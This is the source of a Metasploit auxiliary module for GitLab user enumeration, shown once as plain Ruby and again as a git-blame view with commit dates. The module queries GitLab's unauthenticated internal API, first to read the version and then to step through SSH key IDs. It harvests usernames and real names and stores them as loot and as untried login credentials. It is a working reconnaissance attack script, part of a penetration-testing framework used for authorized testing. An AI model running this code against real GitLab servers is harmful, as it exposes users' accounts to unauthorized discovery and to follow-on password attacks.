metasploit-framework/modules/auxiliary/scanner/http/gitlab_user_enum.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/proto/http'
require 'msf/core'
require 'json'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'GitLab User Enumeration',
      'Description'    => "
        The GitLab 'internal' API is exposed unauthenticated on GitLab. This
        allows the username for each SSH Key ID number to be retrieved. Users
        who do not have an SSH Key cannot be enumerated in this fashion. LDAP
        users, e.g. Active Directory users will also be returned. This issue
        was fixed in GitLab v7.5.0 and is present from GitLab v5.0.0.
      ",
      'Author'         => 'Ben Campbell',
      'License'        => MSF_LICENSE,
      'DisclosureDate' => 'Nov 21 2014',
      'References'     =>
        [
          ['URL', 'https://labs.mwrinfosecurity.com/blog/2015/03/20/gitlab-user-enumeration/']
        ]
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Path to GitLab instance', '/']),
        OptInt.new('START_ID', [true, 'ID number to start from', 0]),
        OptInt.new('END_ID', [true, 'ID number to enumerate up to', 50])
      ], self.class)
  end

  def run_host(_ip)
    internal_api = '/api/v3/internal'
    check = normalize_uri(target_uri.path, internal_api, 'check')

    print_status('Sending GitLab version request...')
    res = send_request_cgi(
        'uri' => check
    )

    if res && res.code == 200 && res.body
      begin
        version = JSON.parse(res.body)
      rescue JSON::ParserError
        fail_with(Failure::Unknown, 'Failed to parse banner version from JSON')
      end

      git_version = version['gitlab_version']
      git_revision = version['gitlab_rev']
      print_good("GitLab version: #{git_version} revision: #{git_revision}")

      service = report_service(
        host: rhost,
        port: rport,
        name: (ssl ? 'https' : 'http'),
        proto: 'tcp'
      )

      report_web_site(
        host: rhost,
        port: rport,
        ssl: ssl,
        info: "GitLab Version - #{git_version}"
      )
    elsif res && res.code == 401
      fail_with(Failure::NotVulnerable, 'Unable to retrieve GitLab version...')
    else
      fail_with(Failure::Unknown, 'Unable to retrieve GitLab version...')
    end

    discover = normalize_uri(target_uri.path, internal_api, 'discover')

    users = ''
    print_status("Enumerating user keys #{datastore['START_ID']}-#{datastore['END_ID']}...")
    datastore['START_ID'].upto(datastore['END_ID']) do |id|
      res = send_request_cgi(
          'uri'       => discover,
          'method'    => 'GET',
          'vars_get'  => { 'key_id' => id }
        )

      if res && res.code == 200 && res.body
        begin
          user = JSON.parse(res.body)
          username = user['username']
          unless username.nil? || username.to_s.empty?
            print_good("Key-ID: #{id} Username: #{username} Name: #{user['name']}")
            store_username(username, res)
            users << "#{username}\n"
          end
        rescue JSON::ParserError
          print_error("Key-ID: #{id} - Unexpected response body: #{res.body}")
        end
      elsif res
        vprint_status("Key-ID: #{id} not found")
      else
        print_error('Connection timed out...')
      end
    end

    unless users.nil? || users.to_s.empty?
      store_userlist(users, service)
    end
  end

  def store_userlist(users, service)
    loot = store_loot('gitlab.users', 'text/plain', rhost, users, nil, 'GitLab Users', service)
    print_good("Userlist stored at #{loot}")
  end

  def store_username(username, res)
    service = ssl ? 'https' : 'http'
    service_data = {
      address: rhost,
      port: rport,
      service_name: service,
      protocol: 'tcp',
      workspace_id: myworkspace_id,
      proof: res
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: username
    }

    credential_data.merge!(service_data)

    # Create the Metasploit::Credential::Core object
    credential_core = create_credential(credential_data)

    # Assemble the options hash for creating the Metasploit::Credential::Login object
    login_data = {
      core: credential_core,
      status: Metasploit::Model::Login::Status::UNTRIED
    }

    # Merge in the service data and create our Login
    login_data.merge!(service_data)
    create_credential_login(login_data)
  end
end
Initial commit 2014-08-17 04:39:12 +00:00			`##`
Fix typo 2015-03-20 17:27:23 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Initial commit 2014-08-17 04:39:12 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'rex/proto/http'`
			`require 'msf/core'`
			`require 'json'`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Auxiliary`
Initial commit 2014-08-17 04:39:12 +00:00			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Auxiliary::Scanner`
			`include Msf::Auxiliary::Report`

			`def initialize(info = {})`
Check revision 2014-12-15 17:20:23 +00:00			`super(update_info(`
			`info,`
Clean up info hash formatting 2015-03-20 22:26:21 +00:00			`'Name' => 'GitLab User Enumeration',`
			`'Description' => "`
Correct capitilzation of GitLab 2015-03-17 11:33:57 +00:00			`The GitLab 'internal' API is exposed unauthenticated on GitLab. This`
Initial commit 2014-08-17 04:39:12 +00:00			`allows the username for each SSH Key ID number to be retrieved. Users`
Check revision 2014-12-15 17:20:23 +00:00			`who do not have an SSH Key cannot be enumerated in this fashion. LDAP`
Small modifications 2015-03-17 10:03:32 +00:00			`users, e.g. Active Directory users will also be returned. This issue`
Correct capitilzation of GitLab 2015-03-17 11:33:57 +00:00			`was fixed in GitLab v7.5.0 and is present from GitLab v5.0.0.`
Check revision 2014-12-15 17:20:23 +00:00			`",`
Clean up info hash formatting 2015-03-20 22:26:21 +00:00			`'Author' => 'Ben Campbell',`
			`'License' => MSF_LICENSE,`
Add reference 2015-03-20 19:17:34 +00:00			`'DisclosureDate' => 'Nov 21 2014',`
Clean up info hash formatting 2015-03-20 22:26:21 +00:00			`'References' =>`
Add reference 2015-03-20 19:17:34 +00:00			`[`
Clean up info hash formatting 2015-03-20 22:26:21 +00:00			`['URL', 'https://labs.mwrinfosecurity.com/blog/2015/03/20/gitlab-user-enumeration/']`
Add reference 2015-03-20 19:17:34 +00:00			`]`
Check revision 2014-12-15 17:20:23 +00:00			`))`
Initial commit 2014-08-17 04:39:12 +00:00
			`register_options(`
			`[`
Correct capitilzation of GitLab 2015-03-17 11:33:57 +00:00			`OptString.new('TARGETURI', [ true, 'Path to GitLab instance', '/']),`
Initial commit 2014-08-17 04:39:12 +00:00			`OptInt.new('START_ID', [true, 'ID number to start from', 0]),`
			`OptInt.new('END_ID', [true, 'ID number to enumerate up to', 50])`
			`], self.class)`
			`end`

			`def run_host(_ip)`
Small modifications 2015-03-17 10:03:32 +00:00			`internal_api = '/api/v3/internal'`
Initial commit 2014-08-17 04:39:12 +00:00			`check = normalize_uri(target_uri.path, internal_api, 'check')`

Correct capitilzation of GitLab 2015-03-17 11:33:57 +00:00			`print_status('Sending GitLab version request...')`
Initial commit 2014-08-17 04:39:12 +00:00			`res = send_request_cgi(`
			`'uri' => check`
			`)`

			`if res && res.code == 200 && res.body`
Should also rescue JSON::ParserError for banner parsing 2015-03-20 17:27:02 +00:00			`begin`
			`version = JSON.parse(res.body)`
			`rescue JSON::ParserError`
			`fail_with(Failure::Unknown, 'Failed to parse banner version from JSON')`
			`end`

Initial commit 2014-08-17 04:39:12 +00:00			`git_version = version['gitlab_version']`
			`git_revision = version['gitlab_rev']`
			`print_good("GitLab version: #{git_version} revision: #{git_revision}")`

Small modifications 2015-03-17 10:03:32 +00:00			`service = report_service(`
Initial commit 2014-08-17 04:39:12 +00:00			`host: rhost,`
			`port: rport,`
			`name: (ssl ? 'https' : 'http'),`
			`proto: 'tcp'`
			`)`

			`report_web_site(`
			`host: rhost,`
			`port: rport,`
			`ssl: ssl,`
Correct capitilzation of GitLab 2015-03-17 11:33:57 +00:00			`info: "GitLab Version - #{git_version}"`
Initial commit 2014-08-17 04:39:12 +00:00			`)`
Catch 7.5 401 2014-12-15 17:44:24 +00:00			`elsif res && res.code == 401`
Correct capitilzation of GitLab 2015-03-17 11:33:57 +00:00			`fail_with(Failure::NotVulnerable, 'Unable to retrieve GitLab version...')`
Store creds in database 2014-12-15 18:13:22 +00:00			`else`
Correct capitilzation of GitLab 2015-03-17 11:33:57 +00:00			`fail_with(Failure::Unknown, 'Unable to retrieve GitLab version...')`
Check revision 2014-12-15 17:20:23 +00:00			`end`

Initial commit 2014-08-17 04:39:12 +00:00			`discover = normalize_uri(target_uri.path, internal_api, 'discover')`

Store to loot as well 2015-03-17 09:55:28 +00:00			`users = ''`
Initial commit 2014-08-17 04:39:12 +00:00			`print_status("Enumerating user keys #{datastore['START_ID']}-#{datastore['END_ID']}...")`
			`datastore['START_ID'].upto(datastore['END_ID']) do \|id\|`
			`res = send_request_cgi(`
			`'uri' => discover,`
			`'method' => 'GET',`
			`'vars_get' => { 'key_id' => id }`
			`)`

Store creds in database 2014-12-15 18:13:22 +00:00			`if res && res.code == 200 && res.body`
Initial commit 2014-08-17 04:39:12 +00:00			`begin`
			`user = JSON.parse(res.body)`
Store to loot as well 2015-03-17 09:55:28 +00:00			`username = user['username']`
			`unless username.nil? \|\| username.to_s.empty?`
			`print_good("Key-ID: #{id} Username: #{username} Name: #{user['name']}")`
			`store_username(username, res)`
			`users << "#{username}\n"`
			`end`
Initial commit 2014-08-17 04:39:12 +00:00			`rescue JSON::ParserError`
			`print_error("Key-ID: #{id} - Unexpected response body: #{res.body}")`
			`end`
			`elsif res`
			`vprint_status("Key-ID: #{id} not found")`
			`else`
			`print_error('Connection timed out...')`
			`end`
			`end`
Store to loot as well 2015-03-17 09:55:28 +00:00
			`unless users.nil? \|\| users.to_s.empty?`
Small modifications 2015-03-17 10:03:32 +00:00			`store_userlist(users, service)`
Store to loot as well 2015-03-17 09:55:28 +00:00			`end`
			`end`

Small modifications 2015-03-17 10:03:32 +00:00			`def store_userlist(users, service)`
Correct capitilzation of GitLab 2015-03-17 11:33:57 +00:00			`loot = store_loot('gitlab.users', 'text/plain', rhost, users, nil, 'GitLab Users', service)`
Store to loot as well 2015-03-17 09:55:28 +00:00			`print_good("Userlist stored at #{loot}")`
Initial commit 2014-08-17 04:39:12 +00:00			`end`
Check revision 2014-12-15 17:20:23 +00:00
Store creds in database 2014-12-15 18:13:22 +00:00			`def store_username(username, res)`
			`service = ssl ? 'https' : 'http'`
			`service_data = {`
			`address: rhost,`
			`port: rport,`
			`service_name: service,`
			`protocol: 'tcp',`
			`workspace_id: myworkspace_id,`
			`proof: res`
			`}`

			`credential_data = {`
			`origin_type: :service,`
			`module_fullname: fullname,`
			`username: username`
			`}`

			`credential_data.merge!(service_data)`

			`# Create the Metasploit::Credential::Core object`
			`credential_core = create_credential(credential_data)`

			`# Assemble the options hash for creating the Metasploit::Credential::Login object`
			`login_data = {`
			`core: credential_core,`
			`status: Metasploit::Model::Login::Status::UNTRIED`
			`}`

			`# Merge in the service data and create our Login`
			`login_data.merge!(service_data)`
			`create_credential_login(login_data)`
			`end`
			`end`